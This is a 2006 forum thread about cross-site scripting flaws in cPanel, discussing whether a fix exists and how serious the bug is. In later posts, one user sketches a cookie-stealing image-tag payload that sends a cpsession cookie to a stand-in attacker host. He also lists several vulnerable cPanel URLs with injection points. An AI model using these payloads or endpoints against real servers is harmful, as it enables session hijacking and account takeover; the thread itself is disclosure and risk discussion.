The Community Forums


Cross Site Scripting

Discussion in 'General Discussion' started by astopy, Feb 3, 2006.

  1. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    From BugTraq:
    Has a fix for this been released?
     
  2. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    This was published yesterday.
     
  3. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Read the advisory - seems like a rather minor bug considering you have to authenticate to get into your cPanel account to achieve this anyway.
     
  4. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    I didn't say it was a major bug, was just wondering if it'd been fixed.
     
  5. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Since there have been no changes to the cPanel versions or the changelog, I would guess not.
     
  6. anup123

    anup123 Well-Known Member

    Joined:
    Mar 29, 2004
    Messages:
    897
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    This Planet
    Oh, I thought security vulnerabilities were not to be posted on forums or Bugzilla. cPanel didn't like it. Or is that rule only for a select few? This was published on 3rd Feb 2006 anyway on Secunia.

    In fact, there are 6-odd reported today.

    Anup
     
    #6 anup123, Feb 6, 2006
    Last edited: Feb 6, 2006
  7. jwiens

    jwiens Member

    Joined:
    Mar 8, 2004
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    XSS is a big deal. The big deal is not that you can get javascript to popup once you've authenticated, it's that once you've authenticated, if I can get you to visit my site, I can steal your cpsession cookie and become you without a password or even a username. Incidentally, cpanel should tie an IP address to a cpsession cookie. That way if the cookie is stolen, it could only be abused from the same IP address. However, I just tested accessing my cpanel with a stolen cookie from a different address and it unfortunately works fine.

    To see what I mean, consider the following:

    Alice logs in to her cpanel to do maintenance, not logging out or closing her browser.
    Some time later she visits a blog she regularly reads written by Eve who knows that Alice uses cpanel. Eve embeds the following img on her page:
    Code:
    <img width=1 height=1 src="http://site-of-alices-cpanel:2082/frontend/xcontroller/editquota.html?email=<script>//JAVASCRIPT CODE TO TAKE CPSESSION COOKIE AND VISIT http://evesites/evilscript?stolencookie=$cpsession//</script>&domain=">
    
    Since the javascript code runs locally on site-of-alices-cpanel, it has full access to steal the cpsession cookie and send it any way it likes back to Eve's server. I omitted the javascript code since 1) it's trivially easy to write, and 2) I don't feel like enabling those who need point and click exploits. But suffice to say, all it takes is for Eve to now surf to http://site-of-alices-cpanel:2082/ with cpsession set to the cookie value she just stole and she has full access to Alice's cpanel.

    So yeah, this is relatively serious.
     
  8. jwiens

    jwiens Member

    Joined:
    Mar 8, 2004
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Incidentally, it looks like there are two different groups announcing vulnerabilities:

    Code:
    http://victim:2082/frontend/xcontroller/editquota.html?email=/code/&domain
    http://victim:2082/frontend/xcontroller/dodelpop.html?email=/code/&domain=xxx
    http://victim:2082/frontend/xcontroller/diskusage.html?showtree=/code/
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=/code/
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=/code/
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=/code/&domain=xxx&target=xxx
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=/code/&year=2006&domain=xxx&target=xxx
    And also:
    Code:
    http://victim:2095/webmailaging.cgi?numdays=/code/&ageaction=change
    I haven't verified them all, but tested the first few on an updated stable cpanel system and they did work.
     
    #8 jwiens, Feb 7, 2006
    Last edited: Feb 7, 2006